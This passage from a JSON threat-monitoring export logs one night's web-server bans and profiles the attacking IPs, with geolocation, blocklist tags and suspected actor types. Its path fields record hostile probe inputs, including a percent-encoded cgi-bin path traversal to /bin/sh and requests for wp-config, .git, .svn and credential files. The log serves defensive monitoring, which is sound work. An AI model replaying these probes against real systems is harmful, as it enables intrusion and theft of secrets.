   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T05:18:00+02:00",
   "ip": "64.204.51.37",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-07T05:18:00+02:00",
   "ip": "45.148.10.171",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 3,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T05:21:00+02:00",
   "ip": "45.138.12.10",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 2,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T05:21:00+02:00",
   "ip": "65.49.1.182",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T05:25:00+02:00",
   "ip": "200.219.11.15",
   "type": "attack-tool",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T05:28:00+02:00",
   "ip": "193.32.162.175",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-07T05:30:00+02:00",
   "ip": "92.113.211.53",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-07T05:33:00+02:00",
   "ip": "2.28.13.214",
   "type": "rce-payload",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T05:34:00+02:00",
   "ip": "93.123.109.101",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-3"
  },
  {
   "t": "2026-10-07T05:42:00+02:00",
   "ip": "93.123.109.101",
   "type": "credential-probe",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-07T05:42:00+02:00",
   "ip": "93.123.109.101",
   "type": "credential-probe",
   "kind": "finding",
   "severity": "critical",
   "path": "/ai/credentials.json",
   "sensor": "web-1"
  },
  {
   "t": "2026-10-07T05:56:00+02:00",
   "ip": "92.113.211.177",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "edge"
  },
  {
   "t": "2026-10-07T05:57:00+02:00",
   "ip": "45.138.12.6",
   "type": "secret-probe",
   "kind": "ban",
   "offence": 1,
   "state": "active",
   "sensor": "web-3"
  }
 ],
 "attackers": [
  {
   "ip": "195.178.110.15",
   "country": "Andorra",
   "cc": "AD",
   "city": "Andorra la Vella",
   "lat": 42.5063,
   "lon": 1.52184,
   "asn": 48090,
   "org": "TECHOFF SRV LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 194,
   "first_seen": "2026-10-06T21:45:00+02:00",
   "last_seen": "2026-10-06T21:45:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [
    "ban expired 22:45"
   ],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "cluster:195.178.110.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS48090 TECHOFF SRV (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "2 addresses from 195.178.110.0/24 (AS48090) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "20.214.170.255",
   "country": "South Korea",
   "cc": "KR",
   "city": "Yongsan-dong",
   "lat": 37.5503,
   "lon": 126.997,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "php-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 188,
   "first_seen": "2026-10-06T21:16:00+02:00",
   "last_seen": "2026-10-06T21:16:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [
    "ban expired 22:16"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "195.178.110.199",
   "country": "Andorra",
   "cc": "AD",
   "city": "Andorra la Vella",
   "lat": 42.5063,
   "lon": 1.52184,
   "asn": 48090,
   "org": "TECHOFF SRV LIMITED",
   "ptr": null,
   "types": [
    "secret-probe",
    "credential-probe"
   ],
   "bans": 1,
   "max_offence": 4,
   "ban_state": "active",
   "requests_known": 149,
   "first_seen": "2026-10-06T20:02:00+02:00",
   "last_seen": "2026-10-06T20:02:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [
    "banned until Tue 13 Oct 20:02"
   ],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:195.178.110.0/24",
    "multi-night"
   ],
   "paths": [
    "/wp-config.php"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS48090 TECHOFF SRV (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "2 addresses from 195.178.110.0/24 (AS48090) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-07"
   ]
  },
  {
   "ip": "45.138.12.24",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "credential-probe"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 81,
   "first_seen": "2026-10-06T20:19:00+02:00",
   "last_seen": "2026-10-06T20:19:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [
    "spared: shared address"
   ],
   "tags": [
    "abuse-prone-hosting",
    "cluster:45.138.12.0/24"
   ],
   "paths": [
    "/credentials.json"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "4 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "62.146.226.80",
   "country": "United States",
   "cc": "US",
   "city": "Newark",
   "lat": 40.7357,
   "lon": -74.1724,
   "asn": 40021,
   "org": "Contabo Inc.",
   "ptr": "vmi3626086.contaboserver.net",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": 40,
   "first_seen": "2026-10-07T00:45:00+02:00",
   "last_seen": "2026-10-07T00:45:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [
    "banned until Wed 06:45"
   ],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "45.238.235.2",
   "country": "Brazil",
   "cc": "BR",
   "city": "Ferraz de Vasconcelos",
   "lat": -23.5408,
   "lon": -46.3686,
   "asn": 268350,
   "org": "R.R.COMUNICA\u00c7\u00c3O & MULTIMIDIA EIRELI",
   "ptr": "dynamic-45-238-235-2.teleleste.net.br",
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 4,
   "ban_state": "active",
   "requests_known": 29,
   "first_seen": "2026-10-07T03:58:00+02:00",
   "last_seen": "2026-10-07T03:58:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [
    "banned until Wed 14 Oct 03:58"
   ],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-07"
   ]
  },
  {
   "ip": "3.129.187.38",
   "country": "United States",
   "cc": "US",
   "city": "Dublin",
   "lat": 40.0992,
   "lon": -83.1141,
   "asn": 16509,
   "org": "Amazon.com, Inc.",
   "ptr": "scan.visionheight.com",
   "types": [],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 20,
   "first_seen": null,
   "last_seen": null,
   "sensors": [
    "web-2",
    "web-3"
   ],
   "notes": [
    "not banned",
    "spared: behaviour only"
   ],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "medium",
    "evidence": [
     "reverse DNS scan.visionheight.com"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "18.218.118.203",
   "country": "United States",
   "cc": "US",
   "city": "Dublin",
   "lat": 40.0992,
   "lon": -83.1141,
   "asn": 16509,
   "org": "Amazon.com, Inc.",
   "ptr": "scan.visionheight.com",
   "types": [],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 16,
   "first_seen": null,
   "last_seen": null,
   "sensors": [
    "web-3"
   ],
   "notes": [
    "spared: behaviour only"
   ],
   "tags": [
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "medium",
    "evidence": [
     "reverse DNS scan.visionheight.com"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "169.40.142.224",
   "country": "France",
   "cc": "FR",
   "city": "Saint-Denis",
   "lat": 48.9362,
   "lon": 2.35744,
   "asn": 215599,
   "org": "Zkillu SAS",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 9,
   "first_seen": "2026-10-07T03:06:00+02:00",
   "last_seen": "2026-10-07T03:06:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [
    "ban expired 04:06"
   ],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "45.138.12.10",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "secret-probe",
    "credential-probe"
   ],
   "bans": 3,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": 5,
   "first_seen": "2026-10-06T19:15:00+02:00",
   "last_seen": "2026-10-07T05:21:00+02:00",
   "sensors": [
    "edge",
    "web-1",
    "web-3"
   ],
   "notes": [
    "banned until Wed 19:15"
   ],
   "tags": [
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:45.138.12.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "4 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "93.123.109.101",
   "country": "Andorra",
   "cc": "AD",
   "city": "Andorra la Vella",
   "lat": 42.5063,
   "lon": 1.52184,
   "asn": 48090,
   "org": "TECHOFF SRV LIMITED",
   "ptr": null,
   "types": [
    "credential-probe",
    "secret-probe"
   ],
   "bans": 3,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": 4,
   "first_seen": "2026-10-07T04:12:00+02:00",
   "last_seen": "2026-10-07T05:42:00+02:00",
   "sensors": [
    "web-1",
    "web-2",
    "web-3"
   ],
   "notes": [
    "banned until Wed 06:42"
   ],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "multi-night"
   ],
   "paths": [
    "/ai/credentials.json"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS48090 TECHOFF SRV (abuse-prone hosting)",
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-07"
   ]
  },
  {
   "ip": "177.8.71.123",
   "country": "Brazil",
   "cc": "BR",
   "city": "Itagua\u00ed",
   "lat": -22.8522,
   "lon": -43.7753,
   "asn": 273663,
   "org": "Network internet",
   "ptr": null,
   "types": [
    "attack-tool",
    "php-probe"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": 3,
   "first_seen": "2026-10-06T23:44:00+02:00",
   "last_seen": "2026-10-07T00:49:00+02:00",
   "sensors": [
    "web-2",
    "web-3"
   ],
   "notes": [
    "not banned"
   ],
   "tags": [
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "223.123.65.54",
   "country": "Pakistan",
   "cc": "PK",
   "city": "Islamabad",
   "lat": 33.6781,
   "lon": 73.162,
   "asn": 59257,
   "org": "CMPak Limited",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": 3,
   "first_seen": "2026-10-06T18:43:00+02:00",
   "last_seen": "2026-10-06T18:43:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [
    "ban expired 00:43"
   ],
   "tags": [
    "repeat-offender"
   ],
   "paths": [
    "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"
   ],
   "actor": {
    "label": "Suspected Mirai-style IoT botnet",
    "confidence": "medium",
    "evidence": [
     "IoT/router exploit path with a downloader typical of Mirai-family loaders"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "66.132.195.109",
   "country": "United States",
   "cc": "US",
   "city": "Ann Arbor (Old West Side)",
   "lat": 42.2809,
   "lon": -83.7489,
   "asn": 398324,
   "org": "Censys, Inc.",
   "ptr": "109.195.132.66.censys-scanner.com",
   "types": [],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 3,
   "first_seen": null,
   "last_seen": null,
   "sensors": [
    "web-2"
   ],
   "notes": [
    "not banned"
   ],
   "tags": [
    "firehol-level1",
    "research-scanner"
   ],
   "paths": [],
   "actor": {
    "label": "Internet research scanner (benign)",
    "confidence": "high",
    "evidence": [
     "ASN organisation matches 'censys'"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "102.244.97.185",
   "country": "Cameroon",
   "cc": "CM",
   "city": "Douala (Akwa I)",
   "lat": 4.0529,
   "lon": 9.69864,
   "asn": 36912,
   "org": "Orange Cameroun SA",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 2,
   "first_seen": "2026-10-06T21:37:00+02:00",
   "last_seen": "2026-10-06T21:37:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [
    "ban expired 22:37"
   ],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "159.223.66.123",
   "country": "Singapore",
   "cc": "SG",
   "city": "Singapore (Pioneer)",
   "lat": 1.32123,
   "lon": 103.695,
   "asn": 14061,
   "org": "DigitalOcean, LLC",
   "ptr": null,
   "types": [
    "cms-probe"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": 2,
   "first_seen": "2026-10-06T21:42:00+02:00",
   "last_seen": "2026-10-06T21:42:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [
    "not banned"
   ],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/wp-json/batch/v1"
   ],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "160.176.73.178",
   "country": "Morocco",
   "cc": "MA",
   "city": "Souq Larb\u2019a al Gharb",
   "lat": 34.6866,
   "lon": -6.00272,
   "asn": 36903,
   "org": "Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": 1,
   "first_seen": "2026-10-07T01:16:00+02:00",
   "last_seen": "2026-10-07T01:33:00+02:00",
   "sensors": [
    "web-1",
    "web-2"
   ],
   "notes": [
    "ban expired 02:16"
   ],
   "tags": [],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "193.32.162.156",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 47890,
   "org": "UNMANAGED LTD",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 3,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T18:45:00+02:00",
   "last_seen": "2026-10-06T20:06:00+02:00",
   "sensors": [
    "edge",
    "web-2",
    "web-3"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:193.32.162.0/24",
    "multi-night"
   ],
   "paths": [
    "/.svn/wc.db"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS47890 UNMANAGED LTD (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "3 addresses from 193.32.162.0/24 (AS47890) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-07"
   ]
  },
  {
   "ip": "193.32.162.175",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 47890,
   "org": "UNMANAGED LTD",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 3,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T22:27:00+02:00",
   "last_seen": "2026-10-07T05:28:00+02:00",
   "sensors": [
    "edge",
    "web-1"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:193.32.162.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS47890 UNMANAGED LTD (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "3 addresses from 193.32.162.0/24 (AS47890) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "169.58.214.236",
   "country": "Germany",
   "cc": "DE",
   "city": "Munich (Au-Haidhausen)",
   "lat": 48.122,
   "lon": 11.589,
   "asn": 51167,
   "org": "Contabo GmbH",
   "ptr": "vmi3621546.contaboserver.net",
   "types": [
    "rce-payload"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T20:01:00+02:00",
   "last_seen": "2026-10-06T21:58:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "172.86.86.158",
   "country": "United States",
   "cc": "US",
   "city": "Ogden",
   "lat": 41.223,
   "lon": -111.974,
   "asn": 14956,
   "org": "RouterHosting LLC",
   "ptr": "158.86.86.172.static.cloudzy.com",
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T23:43:00+02:00",
   "last_seen": "2026-10-07T00:12:00+02:00",
   "sensors": [
    "edge",
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "193.32.162.164",
   "country": "The Netherlands",
   "cc": "NL",
   "city": "Amsterdam",
   "lat": 52.3676,
   "lon": 4.90414,
   "asn": 47890,
   "org": "UNMANAGED LTD",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T00:50:00+02:00",
   "last_seen": "2026-10-07T03:53:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "spamhaus-drop",
    "firehol-level1",
    "abuse-prone-hosting",
    "repeat-offender",
    "cluster:193.32.162.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "listed on Spamhaus DROP",
     "listed on FireHOL level 1",
     "AS47890 UNMANAGED LTD (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "3 addresses from 193.32.162.0/24 (AS47890) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "34.23.170.28",
   "country": "United States",
   "cc": "US",
   "city": "North Charleston",
   "lat": 32.8769,
   "lon": -80.0114,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "28.170.23.34.bc.googleusercontent.com",
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T19:18:00+02:00",
   "last_seen": "2026-10-06T22:32:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "45.138.12.188",
   "country": "Hong Kong",
   "cc": "HK",
   "city": "Sheung Wan",
   "lat": 22.286,
   "lon": 114.152,
   "asn": 218785,
   "org": "TC DATACENTER LIMITED",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 1,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T03:53:00+02:00",
   "last_seen": "2026-10-07T05:11:00+02:00",
   "sensors": [
    "edge",
    "web-3"
   ],
   "notes": [],
   "tags": [
    "abuse-prone-hosting",
    "cluster:45.138.12.0/24"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "medium",
    "evidence": [
     "AS218785 TC DATACENTER (abuse-prone hosting)",
     "hunts for .env, VCS or credential files",
     "4 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "47.95.234.23",
   "country": "China",
   "cc": "CN",
   "city": "Beijing",
   "lat": 39.9042,
   "lon": 116.407,
   "asn": 37963,
   "org": "Hangzhou Alibaba Advertising Co.,Ltd.",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T20:07:00+02:00",
   "last_seen": "2026-10-06T23:16:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "repeat-offender"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "low",
    "evidence": [
     "sent a shell or PHP payload"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "64.247.196.151",
   "country": "United States",
   "cc": "US",
   "city": "Las Vegas",
   "lat": 36.1716,
   "lon": -115.139,
   "asn": 11320,
   "org": "LightEdge Solutions",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 2,
   "max_offence": 2,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T18:02:00+02:00",
   "last_seen": "2026-10-06T18:39:00+02:00",
   "sensors": [
    "web-1",
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender"
   ],
   "paths": [
    "/.git/config"
   ],
   "actor": {
    "label": "Suspected credential/secret-harvesting campaign",
    "confidence": "low",
    "evidence": [
     "hunts for .env, VCS or credential files"
    ]
   },
   "seen_nights": [
    "2026-10-07"
   ]
  },
  {
   "ip": "82.102.18.222",
   "country": "France",
   "cc": "FR",
   "city": "Saint-Denis",
   "lat": 48.9316,
   "lon": 2.35633,
   "asn": 9009,
   "org": "M247 Europe SRL",
   "ptr": "host222.obamal.com",
   "types": [
    "cms-probe"
   ],
   "bans": 2,
   "max_offence": 1,
   "ban_state": "expired",
   "requests_known": null,
   "first_seen": "2026-10-06T22:46:00+02:00",
   "last_seen": "2026-10-07T01:47:00+02:00",
   "sensors": [
    "edge",
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected CMS exploitation bot",
    "confidence": "low",
    "evidence": [
     "CMS, admin panel or PHP script probing"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-07"
   ]
  },
  {
   "ip": "103.216.170.129",
   "country": "India",
   "cc": "IN",
   "city": "Mumbai (Navjeevan Society)",
   "lat": 18.9681,
   "lon": 72.8239,
   "asn": 135198,
   "org": "Bombay Bullion Commmunication",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T19:20:00+02:00",
   "last_seen": "2026-10-06T19:20:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "multi-night"
   ],
   "paths": [
    "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"
   ],
   "actor": {
    "label": "Suspected Mirai-style IoT botnet",
    "confidence": "medium",
    "evidence": [
     "IoT/router exploit path with a downloader typical of Mirai-family loaders"
    ]
   },
   "seen_nights": [
    "2026-10-03",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "103.46.186.148",
   "country": "Indonesia",
   "cc": "ID",
   "city": "Utan",
   "lat": -6.17694,
   "lon": 106.947,
   "asn": 150462,
   "org": "PT Air Lintas Komunikasi",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 3,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-06T21:39:00+02:00",
   "last_seen": "2026-10-06T21:39:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "cluster:103.46.186.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "medium",
    "evidence": [
     "sent a shell or PHP payload",
     "2 addresses from 103.46.186.0/24 (AS150462) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-05",
    "2026-10-06",
    "2026-10-07"
   ]
  },
  {
   "ip": "103.46.186.85",
   "country": "Indonesia",
   "cc": "ID",
   "city": "Utan",
   "lat": -6.17694,
   "lon": 106.947,
   "asn": 150462,
   "org": "PT Air Lintas Komunikasi",
   "ptr": null,
   "types": [
    "rce-payload"
   ],
   "bans": 1,
   "max_offence": 2,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T02:58:00+02:00",
   "last_seen": "2026-10-07T02:58:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "repeat-offender",
    "cluster:103.46.186.0/24",
    "multi-night"
   ],
   "paths": [],
   "actor": {
    "label": "Suspected exploit/RCE bot",
    "confidence": "medium",
    "evidence": [
     "sent a shell or PHP payload",
     "2 addresses from 103.46.186.0/24 (AS150462) attacked the same night"
    ]
   },
   "seen_nights": [
    "2026-10-04",
    "2026-10-07"
   ]
  },
  {
   "ip": "104.244.74.39",
   "country": "Luxembourg",
   "cc": "LU",
   "city": "Bissen",
   "lat": 49.7902,
   "lon": 6.08557,
   "asn": 53667,
   "org": "FranTech Solutions",
   "ptr": null,
   "types": [
    "secret-probe"
   ],
   "bans": 1,
   "max_offence": 4,
   "ban_state": "active",
   "requests_known": null,
   "first_seen": "2026-10-07T03:58:00+02:00",
